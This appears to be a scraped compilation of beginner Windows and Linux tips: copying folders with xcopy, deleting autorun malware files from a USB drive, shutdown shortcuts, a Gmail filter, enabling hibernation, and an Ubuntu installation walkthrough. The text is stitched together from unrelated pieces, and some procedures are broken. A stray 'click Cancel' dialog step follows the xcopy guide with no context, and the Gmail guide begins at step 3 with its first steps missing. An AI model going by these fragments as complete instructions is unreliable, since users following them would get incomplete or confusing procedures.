1.First Create a Folder with any name Ex:- Source.

2.Next  Create a Folder With any name Ex:- Destination.

3.Now go to Start--> Run and type cmd to open the Command Prompt window .

4.Then type CD\ and hit Enter.

5.Then it will appears C:\>.

6.Then type [[[ XCOPY ]]].

7.And Then type Location of the Source Folder [[[ Ex:-C:\Source ]]].

8.Then type Location of the Destination Folder [[[ Ex:-D:\destination ]]].

9.Finally u has to type in the Command Prompt window is [[[ xcopy C:\source D:\destination ]]].

10.Now The Total Files In The Source Folder are Copied to Destination Folder.

Now a dialogue window will popup asking you to choose among the options as shown in the figure.
Don't choose any of them , Just simply click Cancel.

*Now go to Start--> Run and type cmd to open the Command Prompt window .

*Now go to My Computer and Check the Drive letter of your USB drive or Pen Drive.
( E.g. If it is written Kingston (I), then I: will be the drive letter .)

*In the Command Window ( cmd ) , type the drive letter: and Hit Enter .

*Now type dir/w/o/a/p and Hit Enter.

*You will get a list of files . In the list , search if anyone of the following do exist.

1.  Autorun.inf
2.  New Folder.exe
3.  Bha.vbs
4.  Iexplore.vbs
5.  Info.exe
6.  New_Folder.exe
7.  Ravmon.exe
8.  RVHost.exe or any other files with .exe Extension .

If you find any one of the files above , Run the command attrib -h -r -s -a *.* and Hit Enter.

Now Delete each File using the following Command del filename ( E.g del autorun.inf ) .

That's it .Now just scan your USB drive with the anti virus you have to ensure that you made your Pen
Drive free of Virus .

1)The standard approach - click the Start Button with your mouse, then select the Turn Off menu and finally click the Turn Off icon on the Turn Off computer dialog. blink.gif

2)Press Ctrl+Esc key or the Win key and press u two times - the fastest approach.

3)Get the Shutdown utility from Download.com - it add the shut down shortcuts for you. Else create them yourself using approach 4.

4)Create a shutdown shortcut on your desktop. Right click on the desktop, choose New Shortcut and type shutdown -s -t 00 in the area where you are asked to specify the location of the program file. Now you can just double click this icon to turn off the computer. The best location would be your quick launch bar.

5)Press the Win key + R key to open the run window. Type shutdown -s -t 00. [s means shutdown while t means the duration after which you want to initiate the shutdown process].If some open processes or application won't let you turn off, append a -f switch to force a shut down by closing all active processes.

6)Win+M to minimize all windows and then Alt+F4 to bring the Turn Off computer dialog.

3. Under Settings, click on Filters

4. You’ll now see an option “Create a new filter“, click on it

5. Now in the From field enter the email address from which you do not want to receive the emails

For ex. you may enter john@gmail .com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax:*@xyz.com. Now all the incoming emails from the domain xyz.com will be blocked.

6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.

Enabling or Disabling the “Hibernate” option in Windows 7 or Vista is not as simple as it used to be in Windows XP. For Windows 7 a different approach has to be followed to accomplish the same job. In this post you will find how to enable or disable the Hibernate option in Windows 7.

Hibernation is a power saving option which was designed primarily for laptops. Unlike “sleep mode” which puts the open documents and files into the memory, hibernation puts all the open files and documents on to the hard disk and shuts down the computer without drawing even a small amount of power. Thus hibernation becomes an excellent way to save power and resume Windows back to the state where it was left off. If you really want to use this feature on Windows 7 then you need to enable this option. This can be done as follows.

1. Open the Command Prompt with “Administrator rights”. To do so, type cmd in Start menu and then hit Ctrl+Shift+Enter.

2. Now type the following command in the command prompt and hit Enter.

powercfg /hibernate on

3. Type exit and hit Enter to close the Command Prompt. Now you should see the “Hibernate” option in the Start menu. If not then perform the following steps.

A. Type Power Options in the Start menu and hit Enter.

B. In the left pane, open the link labeled “Change when the computer sleeps” and then open the link “Change advanced power settings”.

Now a small window will pop-up as shown below:

C. Now expand the Sleep tree and turn off Allow Hybrid Sleep as shown in the above screenshot.

D. Now you should see the Hibernate option in the Start menu.

Ubuntu is one of the most popular operating systems we have today. Actually most of the people when they got fed up with windows, try to go for Ubuntu hoping that it will change their lives. But most of the people mess up when trying to install it on their systems. Actually its easier than we think… lets see how its done….

First of all what do we need?

• You must have at least 256 MB of RAM to run the alternate install CD (384MB of RAM is required to use the live CD based installer).
• Install requires at least 4 GB of disk space.
• You will also need to have an Ubuntu CD image which you can get from the Ubuntu Download page.
• After you download it burn it to a CD.

OK then Lets start the installation…

1)As the first step we need to set-up your BIOS settings. This is a bit hard to explain but easy to do. Its hard to explain because different people have different versions of BIOS in their systems. So I’ll explain it briefly :

• Login to your BIOS. To do this you have to press DEL or F1 or F2, this may differ according to your own version. When booting up it will show you what key to press, so keep your eyes open!
• Once you login, go to the section which will allow you to change the boot settings, and set CD-ROM or Removable Media as the first boot device.
• After that press F10 to save and exit.

2) Next put your Ubuntu CD into the system and boot it. Then you’ll see a screen as follows :

• First select your language.
• And in the next screen, select “Install Ubuntu”

3) Now you’ll see the welcome screen. Select the language you want to use for the installation process and click “Forward”

4) Next you have to select your time zone. Select your region from the left drop down list and select your zone from the right drop down list. Or you can simply select your country from the map.

5) After that you have to select your keyboard layout. For most of us its suggested by Ubuntu, but if thats not your layout…. you can select it from the list.

6) Next thing is the most important task so follow the instructions carefully! In the next page it will ask you what to do with the partitions :

• In here I have no partitions previously defined, so if thats the case you can continue with the layout that is suggested by ubuntu. But you also can do it manually. For people who already have other operating systems or other partitions, Im recommending to do it manually!
• So in here I have selected “Specify Partitions Manually”. After that click “Forward”

7) Now, if you don’t have any partitions, if the hard disk is brand new, then click on “New Partition Table”. Then they’ll warn you about the risks…. now click “Continue”.

8) Next we need to create the partitions. Select the free space and click on “Add” :

• Now first you have to select what type of partition you want.
• Then give the amount of space you need to give for it.
• Next, the location for the new partition. leave it in its default settings.
• After that you have to specify the format of the partition.
• Finally you have to give the mount point.

If you don’t have any partitions, If your hard disk is new :

• Create one primary partition with about : 30% of the free space, Partition format Ext4, Mount point “/”. (if you want you can make a primary partition with the mount point “/boot” (with about 1 GB) first,  if you do that do not make the root partition (partition with the mount point “/”) primary, make it logical.)
• Create one logical partition with about 5 GB space (this partition should be double the amount of your memory. If you have 1 GB of memory, make this partition 2 GB. But its not compulsory to do like that) , Partition format Swap.
• Create one logical partition with the rest of the free space, Partition format Ext4, Mount point “/home”.

If you have an operating system installed :

• First make some free space (if you don’t have any). Select an existing partition and click on “Change” and then reduce the size of that partition.
• After that create one logical partition with about : 30% of the free space, Partition format Ext4, Mount point “/”.
• Create one logical partition with about 5 GB space (this partition should be double the amount of your memory. If you have 1 GB of memory, make this partition 2 GB. But its not compulsory to do like that) , Partition format Swap.
• Create one logical partition with the rest of the free space, Partition format Ext4, Mount point “/home”.

Note : Its not compulsory to crate two partitions with mount points “/” and “/home”. You can make only the root (“/”) partition.

9) After you finish setting up the partitions click “Forward”

10) Next you have to give your details :

• Give your Name, User name, A strong password, and the login method.
• If you don’t want Ubuntu to prompt you for user-name and password each time you login, click on “Log in automatically”
• But if you want it to ask, select “Require my password to login”
• If you want to encrypt the home folder select “Require my password to login and decrypt my home folder”.
• After you set everything up, click on forward.

11) Now Ubnutu will show you the settings which you have specified throughout the process. Go through it (If you want). And click on “Install”. After that Ubuntu will start installing…

12) During the installation it will start to download the language packs. Now this may take some time, so if you think you are wasting your time, you can skip it.

13) When the installation is over, you’ll be asked to restart the machine. Click on “Restart Now”. Finally the system will eject the CD. Take the CD out and press enter.
